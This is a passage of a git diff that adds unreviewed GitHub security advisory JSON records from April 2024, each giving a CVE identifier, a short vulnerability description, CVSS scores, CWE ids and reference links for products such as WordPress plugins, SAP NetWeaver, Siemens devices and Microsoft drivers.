"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31867" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4714" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/s4scw8bxdhrjs0kg0lhb68xqd8y9lrtf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qp6j-fjg3-9x3h/GHSA-qp6j-fjg3-9x3h.json b/advisories/unreviewed/2024/04/GHSA-qp6j-fjg3-9x3h/GHSA-qp6j-fjg3-9x3h.json new file mode 100644 index 00000000000..7ac06c845ee --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qp6j-fjg3-9x3h/GHSA-qp6j-fjg3-9x3h.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp6j-fjg3-9x3h", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2200" + ], + "details": "The Contact Form by BestWebSoft plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘cntctfrm_contact_subject’ parameter in all versions up to, and including, 4.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2200" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3047840/contact-form-plugin" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/28524702-3428-4fca-afe8-71b3f2dd983d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qpf9-jjvw-pxf2/GHSA-qpf9-jjvw-pxf2.json b/advisories/unreviewed/2024/04/GHSA-qpf9-jjvw-pxf2/GHSA-qpf9-jjvw-pxf2.json new file mode 100644 index 00000000000..13dd73f50b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qpf9-jjvw-pxf2/GHSA-qpf9-jjvw-pxf2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpf9-jjvw-pxf2", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30687" + ], + "details": "An insecure deserialization vulnerability has been identified in ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code via a crafted input to the Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30687" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30687" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qpqh-hxc9-r48w/GHSA-qpqh-hxc9-r48w.json b/advisories/unreviewed/2024/04/GHSA-qpqh-hxc9-r48w/GHSA-qpqh-hxc9-r48w.json new file mode 100644 index 00000000000..f52e7de9dbb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qpqh-hxc9-r48w/GHSA-qpqh-hxc9-r48w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpqh-hxc9-r48w", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29988" + ], + "details": "SmartScreen Prompt Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29988" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29988" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qq7h-25rf-f89f/GHSA-qq7h-25rf-f89f.json b/advisories/unreviewed/2024/04/GHSA-qq7h-25rf-f89f/GHSA-qq7h-25rf-f89f.json new file mode 100644 index 00000000000..5687775e16c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qq7h-25rf-f89f/GHSA-qq7h-25rf-f89f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7h-25rf-f89f", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31236" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Royal Royal Elementor Addons allows Stored XSS.This issue affects Royal Elementor Addons: from n/a through 1.3.93.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31236" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/royal-elementor-addons/wordpress-royal-elementor-addons-plugin-1-3-93-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qqv3-2v93-cwjw/GHSA-qqv3-2v93-cwjw.json b/advisories/unreviewed/2024/04/GHSA-qqv3-2v93-cwjw/GHSA-qqv3-2v93-cwjw.json new file mode 100644 index 00000000000..726a1e5531a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qqv3-2v93-cwjw/GHSA-qqv3-2v93-cwjw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqv3-2v93-cwjw", + "modified": "2024-04-09T03:30:52Z", + "published": "2024-04-09T03:30:52Z", + "aliases": [ + "CVE-2024-27898" + ], + "details": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27898" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3425188" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qr85-xmff-4wqh/GHSA-qr85-xmff-4wqh.json b/advisories/unreviewed/2024/04/GHSA-qr85-xmff-4wqh/GHSA-qr85-xmff-4wqh.json new file mode 100644 index 00000000000..12d9c8bcc44 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qr85-xmff-4wqh/GHSA-qr85-xmff-4wqh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qr85-xmff-4wqh", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2735" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Price List' element in all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2735" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064413/bold-page-builder/trunk/bold-builder.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6cc4a67b-81fa-4ef6-9167-eab5cb9002ec?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qvf6-37g9-5jpr/GHSA-qvf6-37g9-5jpr.json b/advisories/unreviewed/2024/04/GHSA-qvf6-37g9-5jpr/GHSA-qvf6-37g9-5jpr.json new file mode 100644 index 00000000000..8834f96ef23 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qvf6-37g9-5jpr/GHSA-qvf6-37g9-5jpr.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvf6-37g9-5jpr", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6993" + ], + "details": "The Custom post types, Custom Fields & more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and custom post meta in all versions up to, and including, 5.0.4 due to insufficient input sanitization and output escaping on user supplied post meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6993" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3063871%40custom-post-types&new=3063871%40custom-post-types&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b1449a9-6c89-4dec-8107-86cf8a295025?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qvj2-mp9w-8qjx/GHSA-qvj2-mp9w-8qjx.json b/advisories/unreviewed/2024/04/GHSA-qvj2-mp9w-8qjx/GHSA-qvj2-mp9w-8qjx.json new file mode 100644 index 00000000000..6f1ad10842e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qvj2-mp9w-8qjx/GHSA-qvj2-mp9w-8qjx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvj2-mp9w-8qjx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2847" + ], + "details": "The WordPress File Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.24.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2847" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3060091%40wp-file-upload%2Ftrunk&old=3045068%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f665099-d1c3-43a9-b37b-c9f42c9172ad?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qvqf-5w2r-xjgr/GHSA-qvqf-5w2r-xjgr.json b/advisories/unreviewed/2024/04/GHSA-qvqf-5w2r-xjgr/GHSA-qvqf-5w2r-xjgr.json new file mode 100644 index 00000000000..d38f17768fa --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qvqf-5w2r-xjgr/GHSA-qvqf-5w2r-xjgr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvqf-5w2r-xjgr", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-31978" + ], + "details": "A vulnerability has been identified in SINEC NMS (All versions < V2.0 SP2). Affected devices allow authenticated users to export monitoring data. The corresponding API endpoint is susceptible to path traversal and could allow an authenticated attacker to download files from the file system. Under certain circumstances the downloaded files are deleted from the file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31978" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-128433.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-qxqw-792j-v657/GHSA-qxqw-792j-v657.json b/advisories/unreviewed/2024/04/GHSA-qxqw-792j-v657/GHSA-qxqw-792j-v657.json new file mode 100644 index 00000000000..89e925093de --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-qxqw-792j-v657/GHSA-qxqw-792j-v657.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxqw-792j-v657", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20772" + ], + "details": "Media Encoder versions 24.2.1, 23.6.4 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20772" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/media-encoder/apsb24-23.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r225-49p5-w9vp/GHSA-r225-49p5-w9vp.json b/advisories/unreviewed/2024/04/GHSA-r225-49p5-w9vp/GHSA-r225-49p5-w9vp.json new file mode 100644 index 00000000000..c77acd8c3e1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r225-49p5-w9vp/GHSA-r225-49p5-w9vp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r225-49p5-w9vp", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2305" + ], + "details": "The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the BootstrapCard link in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2305" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/bb-bootstrap-cards/tags/1.1.2&old=3056277&new_path=/bb-bootstrap-cards/tags/1.1.3&new=3056277&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac0dfaac-cce6-45f7-ad5b-d7dcb66453bd?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r247-cqp5-chrp/GHSA-r247-cqp5-chrp.json b/advisories/unreviewed/2024/04/GHSA-r247-cqp5-chrp/GHSA-r247-cqp5-chrp.json new file mode 100644 index 00000000000..5aacb5325ce --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r247-cqp5-chrp/GHSA-r247-cqp5-chrp.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r247-cqp5-chrp", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29752" + ], + "details": "In tmu_set_tr_num_thresholds of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29752" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r382-73hv-r5j2/GHSA-r382-73hv-r5j2.json b/advisories/unreviewed/2024/04/GHSA-r382-73hv-r5j2/GHSA-r382-73hv-r5j2.json new file mode 100644 index 00000000000..2a6491dd5f6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r382-73hv-r5j2/GHSA-r382-73hv-r5j2.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r382-73hv-r5j2", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52538" + ], + "details": "Vulnerability of package name verification being bypassed in the HwIms module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52538" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r38q-xpfq-7wq4/GHSA-r38q-xpfq-7wq4.json b/advisories/unreviewed/2024/04/GHSA-r38q-xpfq-7wq4/GHSA-r38q-xpfq-7wq4.json new file mode 100644 index 00000000000..52f9229d1b7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r38q-xpfq-7wq4/GHSA-r38q-xpfq-7wq4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r38q-xpfq-7wq4", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28913" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28913" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28913" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r3r2-738c-mhc2/GHSA-r3r2-738c-mhc2.json b/advisories/unreviewed/2024/04/GHSA-r3r2-738c-mhc2/GHSA-r3r2-738c-mhc2.json new file mode 100644 index 00000000000..f74d1819c2d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r3r2-738c-mhc2/GHSA-r3r2-738c-mhc2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3r2-738c-mhc2", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2623" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget's message parameter in all versions up to, and including, 5.9.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2623" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/browser/assets/front-end/js/view/count-down.js" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3058018%40essential-addons-for-elementor-lite%2Ftrunk&old=3050196%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/baa92aee-a0a0-45d4-aa12-1449a829930c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r4cp-3jcm-fv88/GHSA-r4cp-3jcm-fv88.json b/advisories/unreviewed/2024/04/GHSA-r4cp-3jcm-fv88/GHSA-r4cp-3jcm-fv88.json new file mode 100644 index 00000000000..767255996e1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r4cp-3jcm-fv88/GHSA-r4cp-3jcm-fv88.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4cp-3jcm-fv88", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30191" + ], + "details": "A vulnerability has been identified in SCALANCE W1748-1 M12 (6GK5748-1GY01-0AA0), SCALANCE W1748-1 M12 (6GK5748-1GY01-0TA0), SCALANCE W1788-1 M12 (6GK5788-1GY01-0AA0), SCALANCE W1788-2 EEC M12 (6GK5788-2GY01-0TA0), SCALANCE W1788-2 M12 (6GK5788-2GY01-0AA0), SCALANCE W1788-2IA M12 (6GK5788-2HY01-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0), SCALANCE WAM763-1 (6GK5763-1AL00-7DA0), SCALANCE WAM766-1 (EU) (6GK5766-1GE00-7DA0), SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0), SCALANCE WAM766-1 EEC (EU) (6GK5766-1GE00-7TA0), SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0), SCALANCE WUM763-1 (6GK5763-1AL00-3AA0), SCALANCE WUM763-1 (6GK5763-1AL00-3DA0), SCALANCE WUM766-1 (EU) (6GK5766-1GE00-3DA0), SCALANCE WUM766-1 (US) (6GK5766-1GE00-3DB0). This CVE refers to Scenario 3 \"Override client’s security context\" of CVE-2022-47522.\n\nAffected devices can be tricked into associating a newly negotiated, attacker-controlled, security context with frames belonging to a victim. This could allow a physically proximate attacker to decrypt frames meant for the victim.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30191" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-457702.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r4jj-84rh-4pf7/GHSA-r4jj-84rh-4pf7.json 